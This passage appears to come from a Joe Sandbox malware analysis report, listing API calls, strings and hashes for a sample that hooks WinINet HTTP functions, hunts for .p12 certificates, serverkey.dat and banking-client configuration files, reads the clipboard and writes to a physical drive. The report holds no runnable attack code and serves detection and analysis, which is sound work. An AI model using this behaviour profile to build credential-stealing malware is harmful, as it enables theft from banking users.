                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoadProtectVirtual
                                                                                                                                                                                                              • String ID: CertVerifyCertificateChainPolicy$Crypt32.dll$HttpSendRequestA$HttpSendRequestExA$HttpSendRequestExW$HttpSendRequestW$InternetCloseHandle$InternetQueryDataAvailable$InternetReadFile$InternetReadFileExA$InternetReadFileExW$Wininet.dll
                                                                                                                                                                                                              • API String ID: 1705253364-835984666
                                                                                                                                                                                                              • Opcode ID: 122129ed595366aea5c63170736e12f790e85281c9b8de4799e6295a5da1fdd4
                                                                                                                                                                                                              • Instruction ID: e00aab2f610537250a3807ad93ba4259167017847190aec734ae662f7f5d394a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 122129ed595366aea5c63170736e12f790e85281c9b8de4799e6295a5da1fdd4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E031B3B4BA0337B1EA2076B75D16F6BA55C4F10E88F60013CFB04F2284EBA5E611867C
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012E118E
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 012E11AD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,java), ref: 012E11C5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.exe), ref: 012E11DB
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,.p12), ref: 012E11FF
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,.p12), ref: 012E1221
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,000000FF,00000000,00000000,00000000,00000000,?,.p12), ref: 012E123E
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,000000FF,00000000,00000000,00000000,00000000,?,.p12), ref: 012E1245
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?,?,000000FF,00000000,00000000,00000000,00000000,?,.p12), ref: 012E1255
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,.p12), ref: 012E1271
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FB4B0,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,.p12), ref: 012E1285
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,serverkey.dat), ref: 012E12A4
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,serverkey.dat), ref: 012E12D5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,000000FF,00000000,00000000,00000000,00000000,?,serverkey.dat), ref: 012E12F2
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,000000FF,00000000,00000000,00000000,00000000,?,serverkey.dat), ref: 012E12F9
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?,?,000000FF,00000000,00000000,00000000,00000000,?,serverkey.dat), ref: 012E1309
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,serverkey.dat), ref: 012E1325
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FEB30,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,serverkey.dat), ref: 012E1339
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,013001A0,00000000,00000000,00000000,?,?,?,?,serverkey.dat), ref: 012E1376
                                                                                                                                                                                                                • Part of subcall function 012FB410: PathAddBackslashA.SHLWAPI(61c5c09f), ref: 012FB437
                                                                                                                                                                                                                • Part of subcall function 012FB410: PathFileExistsA.SHLWAPI(?), ref: 012FB4A0
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,?,?,?,serverkey.dat), ref: 012E138E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,serverkey.dat), ref: 012E139F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharHeapMultiWide$CreateThreadmemset$AllocFileHandlePathProcess$BackslashCloseExistsInformationModuleName
                                                                                                                                                                                                              • String ID: .exe$.p12$java$serverkey.dat
                                                                                                                                                                                                              • API String ID: 183229269-3502489836
                                                                                                                                                                                                              • Opcode ID: d60460767e27440d84b533e35fdd68c2c24035dfd09676685b5bf4c053cd42b7
                                                                                                                                                                                                              • Instruction ID: f3bbb49493cf55d8ce3a34c0885f37c6ff7ede143e22205604724fd896473d5f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d60460767e27440d84b533e35fdd68c2c24035dfd09676685b5bf4c053cd42b7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A51C871A553267AFB316B298C4DFEB3FACAF01B61F544228FB04A61C4DBB09550C6B4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 013025F0
                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 013025FD
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(ISClient.cfg), ref: 01302612
                                                                                                                                                                                                                • Part of subcall function 012E74A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,9e2b3e8fa,7765C3F0,?,?,012F2600,00000000,00000001), ref: 012E74C6
                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E74E4
                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetProcessHeap.KERNEL32(00000008,?,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E750D
                                                                                                                                                                                                                • Part of subcall function 012E74A0: HeapAlloc.KERNEL32(00000000,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E7514
                                                                                                                                                                                                                • Part of subcall function 012E74A0: memset.MSVCRT(00000000,00000000,00000001,?,?,012F2600,00000000,00000001,?,774CF550,00000000), ref: 012E7527
                                                                                                                                                                                                                • Part of subcall function 012E74A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012E7553
                                                                                                                                                                                                                • Part of subcall function 012E74A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E7563
                                                                                                                                                                                                                • Part of subcall function 012E74A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 012E7572
                                                                                                                                                                                                                • Part of subcall function 012E74A0: UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012E7585
                                                                                                                                                                                                                • Part of subcall function 012E74A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E7594
                                                                                                                                                                                                                • Part of subcall function 012E74A0: HeapValidate.KERNEL32(00000000), ref: 012E759B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,GKUZ=,?,00000000,00000001), ref: 0130265D
                                                                                                                                                                                                              • strstr.MSVCRT(-00000005,0132A7EC,?,00000000,00000001), ref: 0130267D
                                                                                                                                                                                                              • strstr.MSVCRT(-00000005,013256DC), ref: 0130268F
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 013026BE
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214},00000006), ref: 013026DB
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013026E2
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 013026F4
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01302705
                                                                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 01302753
                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 0130276A
                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 01302773
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Heap$CharCreateHandleMutexNamePathProcessUpperstrstr$AllocCloseExistsFindInformationLockModulePointerPrivateProfileReadReleaseSizeSleepStringUnlockValidatememset
                                                                                                                                                                                                              • String ID: DefaultPrivateDir$GKUZ=$General$ISClient.cfg$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$P0Mw$interpro.ini
                                                                                                                                                                                                              • API String ID: 1854838805-2875928083
                                                                                                                                                                                                              • Opcode ID: b8578e45b58181de5561763717fa02ad53d49520e042181125b06827e07a5a2b
                                                                                                                                                                                                              • Instruction ID: 922acd8fba77a7bc14b6ad75ab77e6a3b03278fcf5c4666dec9d7100d014d53c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8578e45b58181de5561763717fa02ad53d49520e042181125b06827e07a5a2b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 525128315003159BD733AF68DC98BAB7FFDAB05B18F14415CE98593286DBB0D645CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,0000013C), ref: 0130DA71
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,0000024C), ref: 0130DA8C
                                                                                                                                                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000), ref: 0130DB7A
                                                                                                                                                                                                              • strchr.MSVCRT(Desk,0000005C,?,00000000), ref: 0130DB89
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$FolderPathSpecialstrchr
                                                                                                                                                                                                              • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                              • API String ID: 2246752426-2295261572
                                                                                                                                                                                                              • Opcode ID: 87e3049e6f9e99917ea368fcf0356085d927d63f4e72f1c9a10b74ae1d2138c9
                                                                                                                                                                                                              • Instruction ID: d77c9248bb7aa9056503350e7c3eb4909d8e21aed84218e9877075a6aabe966e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87e3049e6f9e99917ea368fcf0356085d927d63f4e72f1c9a10b74ae1d2138c9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AA139719002199FEF32DBE8CC64FEA77E9AF45314F1442D4EA499B1C1D670AA858B90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 012F323D
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 012F325E
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 012F327F
                                                                                                                                                                                                              • GetGUIThreadInfo.USER32(00000000), ref: 012F3286
                                                                                                                                                                                                              • GetOpenClipboardWindow.USER32 ref: 012F329C
                                                                                                                                                                                                              • GetActiveWindow.USER32 ref: 012F32AA
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 012F32D8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013), ref: 012F32FA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F3301
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000013), ref: 012F3311
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 012F332E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F337B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F337E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F338B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F338E
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 012F3399
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 012F33DF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 3472172748-4108050209
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(\iexplore.exe), ref: 012F190E
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000), ref: 012F1915
                                                                                                                                                                                                              • memset.MSVCRT(0132E230,00000000,000002D1,0132E230,0132E230), ref: 012F1990
                                                                                                                                                                                                              • #680.SHELL32(00000000), ref: 012F1999
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,774CF550,774D1620,80000002), ref: 012F19E3
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F19E6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F19F3
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F19F6
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,set_url ,00000000,00000001,774CF550,774D1620,80000002), ref: 012F1A06
                                                                                                                                                                                                              • strstr.MSVCRT(-00000008,set_url ), ref: 012F1A20
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F1A4F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F1A52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F1A5F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F1A62
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatestrstr$#680CommandLinememset
                                                                                                                                                                                                              • String ID: \iexplore.exe$set_url
                                                                                                                                                                                                              • API String ID: 3394688803-3242205626
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01301477
                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 01301484
                                                                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 013014D4
                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 013014F0
                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 013014F9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?), ref: 01301509
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 0130152D
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214},00000006), ref: 0130154A
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 01301551
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 01301563
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01301574
                                                                                                                                                                                                                • Part of subcall function 01300F20: PathAddBackslashA.SHLWAPI(61C5C387), ref: 01300F50
                                                                                                                                                                                                                • Part of subcall function 01300F20: CreateDirectoryA.KERNEL32(?,00000000), ref: 01300F91
                                                                                                                                                                                                                • Part of subcall function 01300F20: GetLastError.KERNEL32 ref: 01300F9B
                                                                                                                                                                                                                • Part of subcall function 01300F20: #680.SHELL32 ref: 01300FA3
                                                                                                                                                                                                                • Part of subcall function 01300F20: PathMakeSystemFolderA.SHLWAPI(?), ref: 01300FB4
                                                                                                                                                                                                                • Part of subcall function 01300F20: SetLastError.KERNEL32(00000000), ref: 01300FBB
                                                                                                                                                                                                                • Part of subcall function 01300F20: SetCurrentDirectoryA.KERNEL32(?), ref: 01300FC8
                                                                                                                                                                                                                • Part of subcall function 01300F20: PathAddBackslashA.SHLWAPI(61C5C387,?,?), ref: 01301037
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashCharCreateDirectoryErrorFileHandleLastMutexNameUpper$#680CloseCurrentFindFolderInformationMakeModulePrivateProfileReleaseSleepStringSystem
                                                                                                                                                                                                              • String ID: DefaultPrivateDir$General$Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}$P0Mw$interpro.ini
                                                                                                                                                                                                              • API String ID: 4105599095-3677208129
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,775B5CE0), ref: 01309991
                                                                                                                                                                                                              • _snprintf.MSVCRT(00000000,00000104,%s\*,00000000), ref: 013099AD
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?), ref: 013099BC
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 013099C9
                                                                                                                                                                                                              • wsprintfA.USER32(?,%s\%s,00000000,0000002E), ref: 01309A08
                                                                                                                                                                                                              • wsprintfA.USER32(00000000,%s\%s,00000000,?), ref: 01309A16
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 01309B0D
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 01309B1C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$FileLocalwsprintf$AllocCloseFirstFreeNext_snprintf
                                                                                                                                                                                                              • String ID: %s%s$%s\%s$%s\*$.
                                                                                                                                                                                                              • API String ID: 2477558990-1591360731
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocfree$exit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 337157181-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012F3411
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32 ref: 012F3428
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32 ref: 012F3438
                                                                                                                                                                                                              • _snprintf.MSVCRT(00000000,00000104,\\.\PhysicalDrive%u,?), ref: 012F3465
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 012F3487
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012F34B1
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 012F34C0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000104,00000000,00000000), ref: 012F34D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 012F34EA
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F3507
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F3518
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Handle$CloseCreateCurrentDirectoryDriveInformationLockPointerTypeUnlockWrite_snprintfmemset
                                                                                                                                                                                                              • String ID: \\.\PhysicalDrive%u
                                                                                                                                                                                                              • API String ID: 649538874-3292898883
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000), ref: 0130DB7A
                                                                                                                                                                                                              • strchr.MSVCRT(Desk,0000005C,?,00000000), ref: 0130DB89
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(000004E3,00000000,Desk,Desk,?,Desk), ref: 0130DC75
                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0130DC89
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharFileFindFirstFolderMultiPathSpecialWidestrchr
                                                                                                                                                                                                              • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                              • API String ID: 23527507-2295261572
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(0132F588,?,774CF550,775B7390,774D0A60,?,?,012F76EC), ref: 012ED987
                                                                                                                                                                                                              • lstrlenA.KERNEL32(0132F588,?,?,012F76EC), ref: 012ED992
                                                                                                                                                                                                              • wsprintfA.USER32(0132F5A0,MSCTF.Shared.MAPPING.%x,?,?,?,012F76EC), ref: 012ED9D2
                                                                                                                                                                                                              • wsprintfA.USER32(0132F54C,MSCTF.Shared.MAPPING.%x,774D0A60,?,?,?,012F76EC), ref: 012ED9E2
                                                                                                                                                                                                              • wsprintfA.USER32(0132F5DC,MSCTF.Shared.MAPPING.%x,?,?,?,?,012F76EC), ref: 012ED9F2
                                                                                                                                                                                                              • wsprintfA.USER32(0132F670,MSCTF.Shared.MUTEX.%x,?,?,?,?,?,012F76EC), ref: 012ED9FF
                                                                                                                                                                                                              • wsprintfA.USER32(0132F630,MSCTF.Shared.MUTEX.%x,774D0A60,?,?,?,?,?,012F76EC), ref: 012EDA0C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wsprintf$ComputerNamelstrlen
                                                                                                                                                                                                              • String ID: MSCTF.Shared.MAPPING.%x$MSCTF.Shared.MUTEX.%x
                                                                                                                                                                                                              • API String ID: 776485234-1938657081
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,?), ref: 012E953B
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 012E954A
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 012E9561
                                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 012E9569
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 012E9576
                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 012E9581
                                                                                                                                                                                                              • SetClipboardData.USER32(00000001,00000000), ref: 012E958A
                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 012E9590
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
